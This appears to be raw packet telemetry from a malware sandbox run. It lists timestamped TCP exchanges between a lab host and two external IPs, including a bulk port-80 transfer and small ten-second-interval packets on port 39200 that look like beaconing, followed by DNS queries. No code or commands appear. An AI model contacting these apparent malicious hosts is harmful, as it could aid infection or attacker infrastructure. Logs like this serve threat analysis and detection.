Aug 2, 2021 15:17:47.736596107 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.736627102 CEST	49758	80	192.168.2.4	101.99.94.119
Aug 2, 2021 15:17:47.736632109 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.736649036 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.736665964 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.736687899 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.736687899 CEST	49758	80	192.168.2.4	101.99.94.119
Aug 2, 2021 15:17:47.736710072 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.736732006 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.736752033 CEST	49758	80	192.168.2.4	101.99.94.119
Aug 2, 2021 15:17:47.736756086 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.736778975 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.736799002 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.736805916 CEST	49758	80	192.168.2.4	101.99.94.119
Aug 2, 2021 15:17:47.736816883 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.736833096 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.736850977 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.736866951 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.736882925 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.736900091 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.736917019 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.736932993 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.736949921 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.736967087 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.736989021 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.737004995 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.737020969 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.737032890 CEST	49758	80	192.168.2.4	101.99.94.119
Aug 2, 2021 15:17:47.737037897 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.737055063 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.737071037 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.737087011 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.737104893 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.737122059 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.737138033 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.737154961 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.737173080 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.737189054 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.737205982 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.737222910 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.737241030 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.737257957 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.737273932 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.737291098 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.737307072 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.737801075 CEST	49758	80	192.168.2.4	101.99.94.119
Aug 2, 2021 15:17:47.788991928 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.789026976 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.789047956 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.789067984 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.789082050 CEST	49758	80	192.168.2.4	101.99.94.119
Aug 2, 2021 15:17:47.789091110 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.789109945 CEST	49758	80	192.168.2.4	101.99.94.119
Aug 2, 2021 15:17:47.789113045 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.789138079 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.789160013 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.789175034 CEST	49758	80	192.168.2.4	101.99.94.119
Aug 2, 2021 15:17:47.789180994 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.789201975 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.789213896 CEST	49758	80	192.168.2.4	101.99.94.119
Aug 2, 2021 15:17:47.789222956 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.789243937 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.789264917 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.789266109 CEST	49758	80	192.168.2.4	101.99.94.119
Aug 2, 2021 15:17:47.789284945 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.789309025 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.789313078 CEST	49758	80	192.168.2.4	101.99.94.119
Aug 2, 2021 15:17:47.789330006 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.789350033 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.789350986 CEST	49758	80	192.168.2.4	101.99.94.119
Aug 2, 2021 15:17:47.789371014 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.789391041 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.789407969 CEST	49758	80	192.168.2.4	101.99.94.119
Aug 2, 2021 15:17:47.789412022 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.789433002 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.789453983 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.789467096 CEST	49758	80	192.168.2.4	101.99.94.119
Aug 2, 2021 15:17:47.789478064 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.789503098 CEST	49758	80	192.168.2.4	101.99.94.119
Aug 2, 2021 15:17:47.789539099 CEST	49758	80	192.168.2.4	101.99.94.119
Aug 2, 2021 15:17:47.790102005 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.790127993 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.790152073 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.790173054 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.790172100 CEST	49758	80	192.168.2.4	101.99.94.119
Aug 2, 2021 15:17:47.790189981 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.790206909 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.790211916 CEST	49758	80	192.168.2.4	101.99.94.119
Aug 2, 2021 15:17:47.790225029 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.790241957 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.790257931 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.790276051 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.790297031 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.790318012 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.790337086 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.790357113 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.790378094 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.790378094 CEST	49758	80	192.168.2.4	101.99.94.119
Aug 2, 2021 15:17:47.790401936 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.790424109 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.790493011 CEST	49758	80	192.168.2.4	101.99.94.119
Aug 2, 2021 15:17:47.841871977 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.841989040 CEST	49758	80	192.168.2.4	101.99.94.119
Aug 2, 2021 15:17:47.893671036 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.893769026 CEST	49758	80	192.168.2.4	101.99.94.119
Aug 2, 2021 15:17:47.945087910 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.945192099 CEST	49758	80	192.168.2.4	101.99.94.119
Aug 2, 2021 15:17:47.999533892 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.999619007 CEST	49758	80	192.168.2.4	101.99.94.119
Aug 2, 2021 15:17:48.053102016 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:48.054332018 CEST	49758	80	192.168.2.4	101.99.94.119
Aug 2, 2021 15:17:48.106970072 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:48.107522964 CEST	49758	80	192.168.2.4	101.99.94.119
Aug 2, 2021 15:17:48.160861015 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:48.160902023 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:48.161406994 CEST	49758	80	192.168.2.4	101.99.94.119
Aug 2, 2021 15:17:48.161448002 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:48.161479950 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:48.161501884 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:48.161529064 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:48.161552906 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:48.161552906 CEST	49758	80	192.168.2.4	101.99.94.119
Aug 2, 2021 15:17:48.161575079 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:48.161597967 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:48.161619902 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:48.161642075 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:48.161664963 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:48.161673069 CEST	49758	80	192.168.2.4	101.99.94.119
Aug 2, 2021 15:17:48.161686897 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:48.161705971 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:48.161762953 CEST	49758	80	192.168.2.4	101.99.94.119
Aug 2, 2021 15:17:48.161825895 CEST	49758	80	192.168.2.4	101.99.94.119
Aug 2, 2021 15:17:48.344793081 CEST	49759	39200	192.168.2.4	194.5.97.128
Aug 2, 2021 15:17:48.388696909 CEST	39200	49759	194.5.97.128	192.168.2.4
Aug 2, 2021 15:17:48.388786077 CEST	49759	39200	192.168.2.4	194.5.97.128
Aug 2, 2021 15:17:48.402776003 CEST	49759	39200	192.168.2.4	194.5.97.128
Aug 2, 2021 15:17:48.452044010 CEST	39200	49759	194.5.97.128	192.168.2.4
Aug 2, 2021 15:17:48.502567053 CEST	49759	39200	192.168.2.4	194.5.97.128
Aug 2, 2021 15:17:48.546519041 CEST	39200	49759	194.5.97.128	192.168.2.4
Aug 2, 2021 15:17:48.560137987 CEST	49759	39200	192.168.2.4	194.5.97.128
Aug 2, 2021 15:17:48.626106024 CEST	39200	49759	194.5.97.128	192.168.2.4
Aug 2, 2021 15:17:48.627770901 CEST	49759	39200	192.168.2.4	194.5.97.128
Aug 2, 2021 15:17:48.697213888 CEST	39200	49759	194.5.97.128	192.168.2.4
Aug 2, 2021 15:17:48.743263960 CEST	39200	49759	194.5.97.128	192.168.2.4
Aug 2, 2021 15:17:48.747205019 CEST	49759	39200	192.168.2.4	194.5.97.128
Aug 2, 2021 15:17:48.822176933 CEST	39200	49759	194.5.97.128	192.168.2.4
Aug 2, 2021 15:17:52.823203087 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:52.823385000 CEST	49758	80	192.168.2.4	101.99.94.119
Aug 2, 2021 15:17:58.759826899 CEST	39200	49759	194.5.97.128	192.168.2.4
Aug 2, 2021 15:17:58.782565117 CEST	49759	39200	192.168.2.4	194.5.97.128
Aug 2, 2021 15:17:58.853370905 CEST	39200	49759	194.5.97.128	192.168.2.4
Aug 2, 2021 15:18:08.778126001 CEST	39200	49759	194.5.97.128	192.168.2.4
Aug 2, 2021 15:18:08.812906981 CEST	49759	39200	192.168.2.4	194.5.97.128
Aug 2, 2021 15:18:08.869131088 CEST	39200	49759	194.5.97.128	192.168.2.4
Aug 2, 2021 15:18:18.791344881 CEST	39200	49759	194.5.97.128	192.168.2.4
Aug 2, 2021 15:18:18.812283993 CEST	49759	39200	192.168.2.4	194.5.97.128
Aug 2, 2021 15:18:18.868599892 CEST	39200	49759	194.5.97.128	192.168.2.4
Aug 2, 2021 15:18:28.806505919 CEST	39200	49759	194.5.97.128	192.168.2.4
Aug 2, 2021 15:18:28.826035976 CEST	49759	39200	192.168.2.4	194.5.97.128
Aug 2, 2021 15:18:28.899750948 CEST	39200	49759	194.5.97.128	192.168.2.4
Aug 2, 2021 15:18:38.821619034 CEST	39200	49759	194.5.97.128	192.168.2.4
Aug 2, 2021 15:18:38.825505972 CEST	49759	39200	192.168.2.4	194.5.97.128
Aug 2, 2021 15:18:38.899487019 CEST	39200	49759	194.5.97.128	192.168.2.4
Aug 2, 2021 15:18:48.837002039 CEST	39200	49759	194.5.97.128	192.168.2.4
Aug 2, 2021 15:18:48.841221094 CEST	49759	39200	192.168.2.4	194.5.97.128
Aug 2, 2021 15:18:48.903397083 CEST	39200	49759	194.5.97.128	192.168.2.4
Aug 2, 2021 15:18:58.852597952 CEST	39200	49759	194.5.97.128	192.168.2.4
Aug 2, 2021 15:18:58.855600119 CEST	49759	39200	192.168.2.4	194.5.97.128
Aug 2, 2021 15:18:58.930416107 CEST	39200	49759	194.5.97.128	192.168.2.4
Aug 2, 2021 15:19:08.868010044 CEST	39200	49759	194.5.97.128	192.168.2.4
Aug 2, 2021 15:19:08.875335932 CEST	49759	39200	192.168.2.4	194.5.97.128
Aug 2, 2021 15:19:08.945885897 CEST	39200	49759	194.5.97.128	192.168.2.4
Aug 2, 2021 15:19:18.885737896 CEST	39200	49759	194.5.97.128	192.168.2.4
Aug 2, 2021 15:19:18.890950918 CEST	49759	39200	192.168.2.4	194.5.97.128
Aug 2, 2021 15:19:18.962058067 CEST	39200	49759	194.5.97.128	192.168.2.4
Aug 2, 2021 15:19:28.898973942 CEST	39200	49759	194.5.97.128	192.168.2.4
Aug 2, 2021 15:19:28.904418945 CEST	49759	39200	192.168.2.4	194.5.97.128
Aug 2, 2021 15:19:28.981731892 CEST	39200	49759	194.5.97.128	192.168.2.4
Aug 2, 2021 15:19:37.140697002 CEST	49758	80	192.168.2.4	101.99.94.119
Aug 2, 2021 15:19:37.449441910 CEST	49758	80	192.168.2.4	101.99.94.119
Aug 2, 2021 15:19:38.058860064 CEST	49758	80	192.168.2.4	101.99.94.119
Aug 2, 2021 15:19:38.914410114 CEST	39200	49759	194.5.97.128	192.168.2.4
Aug 2, 2021 15:19:38.920722008 CEST	49759	39200	192.168.2.4	194.5.97.128
Aug 2, 2021 15:19:38.995218992 CEST	39200	49759	194.5.97.128	192.168.2.4
Aug 2, 2021 15:19:39.262039900 CEST	49758	80	192.168.2.4	101.99.94.119
Aug 2, 2021 15:19:41.668593884 CEST	49758	80	192.168.2.4	101.99.94.119
Aug 2, 2021 15:19:46.481383085 CEST	49758	80	192.168.2.4	101.99.94.119
Aug 2, 2021 15:19:48.930032969 CEST	39200	49759	194.5.97.128	192.168.2.4
Aug 2, 2021 15:19:48.933672905 CEST	49759	39200	192.168.2.4	194.5.97.128
Aug 2, 2021 15:19:49.007586956 CEST	39200	49759	194.5.97.128	192.168.2.4
Aug 2, 2021 15:19:56.091660976 CEST	49758	80	192.168.2.4	101.99.94.119
Aug 2, 2021 15:19:58.945142984 CEST	39200	49759	194.5.97.128	192.168.2.4
Aug 2, 2021 15:19:58.959281921 CEST	49759	39200	192.168.2.4	194.5.97.128
Aug 2, 2021 15:19:59.023140907 CEST	39200	49759	194.5.97.128	192.168.2.4
Aug 2, 2021 15:20:08.960505009 CEST	39200	49759	194.5.97.128	192.168.2.4
Aug 2, 2021 15:20:08.964808941 CEST	49759	39200	192.168.2.4	194.5.97.128
Aug 2, 2021 15:20:09.040757895 CEST	39200	49759	194.5.97.128	192.168.2.4
Aug 2, 2021 15:20:18.976104021 CEST	39200	49759	194.5.97.128	192.168.2.4
Aug 2, 2021 15:20:18.981451988 CEST	49759	39200	192.168.2.4	194.5.97.128
Aug 2, 2021 15:20:19.038335085 CEST	39200	49759	194.5.97.128	192.168.2.4
Aug 2, 2021 15:20:28.991583109 CEST	39200	49759	194.5.97.128	192.168.2.4
Aug 2, 2021 15:20:28.996037006 CEST	49759	39200	192.168.2.4	194.5.97.128
Aug 2, 2021 15:20:29.069463968 CEST	39200	49759	194.5.97.128	192.168.2.4
Aug 2, 2021 15:20:39.006964922 CEST	39200	49759	194.5.97.128	192.168.2.4
Aug 2, 2021 15:20:39.012142897 CEST	49759	39200	192.168.2.4	194.5.97.128
Aug 2, 2021 15:20:39.069236994 CEST	39200	49759	194.5.97.128	192.168.2.4
Aug 2, 2021 15:20:49.022372007 CEST	39200	49759	194.5.97.128	192.168.2.4
Aug 2, 2021 15:20:49.031208992 CEST	49759	39200	192.168.2.4	194.5.97.128
Aug 2, 2021 15:20:49.100480080 CEST	39200	49759	194.5.97.128	192.168.2.4
Aug 2, 2021 15:20:59.038786888 CEST	39200	49759	194.5.97.128	192.168.2.4
Aug 2, 2021 15:20:59.043781042 CEST	49759	39200	192.168.2.4	194.5.97.128
Aug 2, 2021 15:20:59.104412079 CEST	39200	49759	194.5.97.128	192.168.2.4
Aug 2, 2021 15:21:09.053309917 CEST	39200	49759	194.5.97.128	192.168.2.4
Aug 2, 2021 15:21:09.057351112 CEST	49759	39200	192.168.2.4	194.5.97.128
Aug 2, 2021 15:21:09.131237030 CEST	39200	49759	194.5.97.128	192.168.2.4
Aug 2, 2021 15:21:19.068860054 CEST	39200	49759	194.5.97.128	192.168.2.4
Aug 2, 2021 15:21:19.074218988 CEST	49759	39200	192.168.2.4	194.5.97.128
Aug 2, 2021 15:21:19.146742105 CEST	39200	49759	194.5.97.128	192.168.2.4
Aug 2, 2021 15:21:29.084642887 CEST	39200	49759	194.5.97.128	192.168.2.4
Aug 2, 2021 15:21:29.089131117 CEST	49759	39200	192.168.2.4	194.5.97.128
Aug 2, 2021 15:21:29.162301064 CEST	39200	49759	194.5.97.128	192.168.2.4
Aug 2, 2021 15:21:39.099672079 CEST	39200	49759	194.5.97.128	192.168.2.4
Aug 2, 2021 15:21:39.104465961 CEST	49759	39200	192.168.2.4	194.5.97.128
Aug 2, 2021 15:21:39.177572012 CEST	39200	49759	194.5.97.128	192.168.2.4
Aug 2, 2021 15:21:49.115345955 CEST	39200	49759	194.5.97.128	192.168.2.4
Aug 2, 2021 15:21:49.120986938 CEST	49759	39200	192.168.2.4	194.5.97.128
Aug 2, 2021 15:21:49.193120956 CEST	39200	49759	194.5.97.128	192.168.2.4
Aug 2, 2021 15:21:59.130600929 CEST	39200	49759	194.5.97.128	192.168.2.4
Aug 2, 2021 15:21:59.154213905 CEST	49759	39200	192.168.2.4	194.5.97.128
Aug 2, 2021 15:21:59.224560976 CEST	39200	49759	194.5.97.128	192.168.2.4
Aug 2, 2021 15:22:09.145946980 CEST	39200	49759	194.5.97.128	192.168.2.4
Aug 2, 2021 15:22:09.149513960 CEST	49759	39200	192.168.2.4	194.5.97.128
Aug 2, 2021 15:22:09.223997116 CEST	39200	49759	194.5.97.128	192.168.2.4
Aug 2, 2021 15:22:19.161582947 CEST	39200	49759	194.5.97.128	192.168.2.4
Aug 2, 2021 15:22:19.164613008 CEST	49759	39200	192.168.2.4	194.5.97.128
Aug 2, 2021 15:22:19.239443064 CEST	39200	49759	194.5.97.128	192.168.2.4
Aug 2, 2021 15:22:29.177519083 CEST	39200	49759	194.5.97.128	192.168.2.4
Aug 2, 2021 15:22:29.181351900 CEST	49759	39200	192.168.2.4	194.5.97.128
Aug 2, 2021 15:22:29.239309072 CEST	39200	49759	194.5.97.128	192.168.2.4
Aug 2, 2021 15:22:39.192292929 CEST	39200	49759	194.5.97.128	192.168.2.4
Aug 2, 2021 15:22:39.200300932 CEST	49759	39200	192.168.2.4	194.5.97.128
Aug 2, 2021 15:22:39.270399094 CEST	39200	49759	194.5.97.128	192.168.2.4
Aug 2, 2021 15:22:49.209588051 CEST	39200	49759	194.5.97.128	192.168.2.4
Aug 2, 2021 15:22:49.216274977 CEST	49759	39200	192.168.2.4	194.5.97.128
Aug 2, 2021 15:22:49.285770893 CEST	39200	49759	194.5.97.128	192.168.2.4
Aug 2, 2021 15:22:59.223284006 CEST	39200	49759	194.5.97.128	192.168.2.4
Aug 2, 2021 15:22:59.227001905 CEST	49759	39200	192.168.2.4	194.5.97.128
Aug 2, 2021 15:22:59.301178932 CEST	39200	49759	194.5.97.128	192.168.2.4
Aug 2, 2021 15:23:11.379180908 CEST	39200	49759	194.5.97.128	192.168.2.4
Aug 2, 2021 15:23:11.385339975 CEST	49759	39200	192.168.2.4	194.5.97.128
Aug 2, 2021 15:23:11.457237005 CEST	39200	49759	194.5.97.128	192.168.2.4
Aug 2, 2021 15:23:19.254262924 CEST	39200	49759	194.5.97.128	192.168.2.4
Aug 2, 2021 15:23:19.258421898 CEST	49759	39200	192.168.2.4	194.5.97.128
Aug 2, 2021 15:23:19.332909107 CEST	39200	49759	194.5.97.128	192.168.2.4
Aug 2, 2021 15:23:29.270495892 CEST	39200	49759	194.5.97.128	192.168.2.4
Aug 2, 2021 15:23:29.273772955 CEST	49759	39200	192.168.2.4	194.5.97.128
Aug 2, 2021 15:23:29.331949949 CEST	39200	49759	194.5.97.128	192.168.2.4
Aug 2, 2021 15:23:39.285047054 CEST	39200	49759	194.5.97.128	192.168.2.4
Aug 2, 2021 15:23:39.288584948 CEST	49759	39200	192.168.2.4	194.5.97.128
Aug 2, 2021 15:23:39.363078117 CEST	39200	49759	194.5.97.128	192.168.2.4
Aug 2, 2021 15:23:49.300389051 CEST	39200	49759	194.5.97.128	192.168.2.4
Aug 2, 2021 15:23:49.305772066 CEST	49759	39200	192.168.2.4	194.5.97.128
Aug 2, 2021 15:23:49.378467083 CEST	39200	49759	194.5.97.128	192.168.2.4
Aug 2, 2021 15:23:59.317543030 CEST	39200	49759	194.5.97.128	192.168.2.4
Aug 2, 2021 15:23:59.325150013 CEST	49759	39200	192.168.2.4	194.5.97.128
Aug 2, 2021 15:23:59.393920898 CEST	39200	49759	194.5.97.128	192.168.2.4
Aug 2, 2021 15:24:09.333589077 CEST	39200	49759	194.5.97.128	192.168.2.4
Aug 2, 2021 15:24:09.345204115 CEST	49759	39200	192.168.2.4	194.5.97.128
Aug 2, 2021 15:24:09.409342051 CEST	39200	49759	194.5.97.128	192.168.2.4
Aug 2, 2021 15:24:19.346946001 CEST	39200	49759	194.5.97.128	192.168.2.4
Aug 2, 2021 15:24:19.352615118 CEST	49759	39200	192.168.2.4	194.5.97.128
Aug 2, 2021 15:24:19.409318924 CEST	39200	49759	194.5.97.128	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 2, 2021 15:15:48.615036011 CEST	49714	53	192.168.2.4	8.8.8.8
Aug 2, 2021 15:15:48.642694950 CEST	53	49714	8.8.8.8	192.168.2.4
Aug 2, 2021 15:15:49.469579935 CEST	58028	53	192.168.2.4	8.8.8.8
Aug 2, 2021 15:15:49.506714106 CEST	53	58028	8.8.8.8	192.168.2.4
Aug 2, 2021 15:15:49.614150047 CEST	53097	53	192.168.2.4	8.8.8.8
Aug 2, 2021 15:15:49.638915062 CEST	53	53097	8.8.8.8	192.168.2.4
Aug 2, 2021 15:15:50.817020893 CEST	49257	53	192.168.2.4	8.8.8.8
Aug 2, 2021 15:15:50.852533102 CEST	53	49257	8.8.8.8	192.168.2.4
Aug 2, 2021 15:15:51.977631092 CEST	62389	53	192.168.2.4	8.8.8.8
Aug 2, 2021 15:15:52.003667116 CEST	53	62389	8.8.8.8	192.168.2.4
Aug 2, 2021 15:15:53.560806990 CEST	49910	53	192.168.2.4	8.8.8.8
Aug 2, 2021 15:15:53.585360050 CEST	53	49910	8.8.8.8	192.168.2.4
Aug 2, 2021 15:15:54.237910032 CEST	55854	53	192.168.2.4	8.8.8.8
Aug 2, 2021 15:15:54.273222923 CEST	53	55854	8.8.8.8	192.168.2.4
Aug 2, 2021 15:16:00.731826067 CEST	64549	53	192.168.2.4	8.8.8.8
Aug 2, 2021 15:16:00.760391951 CEST	53	64549	8.8.8.8	192.168.2.4
Aug 2, 2021 15:16:01.466253996 CEST	63153	53	192.168.2.4	8.8.8.8
Aug 2, 2021 15:16:01.494025946 CEST	53	63153	8.8.8.8	192.168.2.4
Aug 2, 2021 15:16:02.502438068 CEST	52991	53	192.168.2.4	8.8.8.8
Aug 2, 2021 15:16:02.530064106 CEST	53	52991	8.8.8.8	192.168.2.4
Aug 2, 2021 15:16:05.477528095 CEST	53700	53	192.168.2.4	8.8.8.8
Aug 2, 2021 15:16:05.503992081 CEST	53	53700	8.8.8.8	192.168.2.4
Aug 2, 2021 15:16:06.188730001 CEST	51726	53	192.168.2.4	8.8.8.8
Aug 2, 2021 15:16:06.213670015 CEST	53	51726	8.8.8.8	192.168.2.4
Aug 2, 2021 15:16:07.164069891 CEST	56794	53	192.168.2.4	8.8.8.8
Aug 2, 2021 15:16:07.191531897 CEST	53	56794	8.8.8.8	192.168.2.4
Aug 2, 2021 15:16:08.279195070 CEST	56534	53	192.168.2.4	8.8.8.8
Aug 2, 2021 15:16:08.307786942 CEST	53	56534	8.8.8.8	192.168.2.4
Aug 2, 2021 15:16:09.184331894 CEST	56627	53	192.168.2.4	8.8.8.8
Aug 2, 2021 15:16:09.209460020 CEST	53	56627	8.8.8.8	192.168.2.4
Aug 2, 2021 15:16:14.136224031 CEST	53157	53	192.168.2.4	8.8.8.8
Aug 2, 2021 15:16:14.163957119 CEST	53	53157	8.8.8.8	192.168.2.4
Aug 2, 2021 15:16:15.007100105 CEST	56621	53	192.168.2.4	8.8.8.8
Aug 2, 2021 15:16:15.039376974 CEST	53	56621	8.8.8.8	192.168.2.4
Aug 2, 2021 15:16:16.033565044 CEST	63116	53	192.168.2.4	8.8.8.8
Aug 2, 2021 15:16:16.060931921 CEST	53	63116	8.8.8.8	192.168.2.4
Aug 2, 2021 15:16:18.747334957 CEST	64078	53	192.168.2.4	8.8.8.8
Aug 2, 2021 15:16:18.774888039 CEST	53	64078	8.8.8.8	192.168.2.4
Aug 2, 2021 15:16:21.603003025 CEST	64801	53	192.168.2.4	8.8.8.8
Aug 2, 2021 15:16:21.644934893 CEST	53	64801	8.8.8.8	192.168.2.4
Aug 2, 2021 15:16:41.079384089 CEST	61721	53	192.168.2.4	8.8.8.8
Aug 2, 2021 15:16:41.116955996 CEST	53	61721	8.8.8.8	192.168.2.4
Aug 2, 2021 15:16:47.369030952 CEST	51255	53	192.168.2.4	8.8.8.8
Aug 2, 2021 15:16:47.409276009 CEST	53	51255	8.8.8.8	192.168.2.4
Aug 2, 2021 15:16:48.311381102 CEST	61522	53	192.168.2.4	8.8.8.8
Aug 2, 2021 15:16:48.449517012 CEST	53	61522	8.8.8.8	192.168.2.4
Aug 2, 2021 15:16:49.167481899 CEST	52337	53	192.168.2.4	8.8.8.8
Aug 2, 2021 15:16:49.195369959 CEST	53	52337	8.8.8.8	192.168.2.4
Aug 2, 2021 15:16:49.488337994 CEST	55046	53	192.168.2.4	8.8.8.8
Aug 2, 2021 15:16:49.522317886 CEST	53	55046	8.8.8.8	192.168.2.4
Aug 2, 2021 15:16:49.966597080 CEST	49612	53	192.168.2.4	8.8.8.8
Aug 2, 2021 15:16:50.001882076 CEST	53	49612	8.8.8.8	192.168.2.4
Aug 2, 2021 15:16:50.460689068 CEST	49285	53	192.168.2.4	8.8.8.8
Aug 2, 2021 15:16:50.494363070 CEST	53	49285	8.8.8.8	192.168.2.4
Aug 2, 2021 15:16:50.686021090 CEST	50601	53	192.168.2.4	8.8.8.8
Aug 2, 2021 15:16:50.726197958 CEST	53	50601	8.8.8.8	192.168.2.4
Aug 2, 2021 15:16:50.950455904 CEST	60875	53	192.168.2.4	8.8.8.8
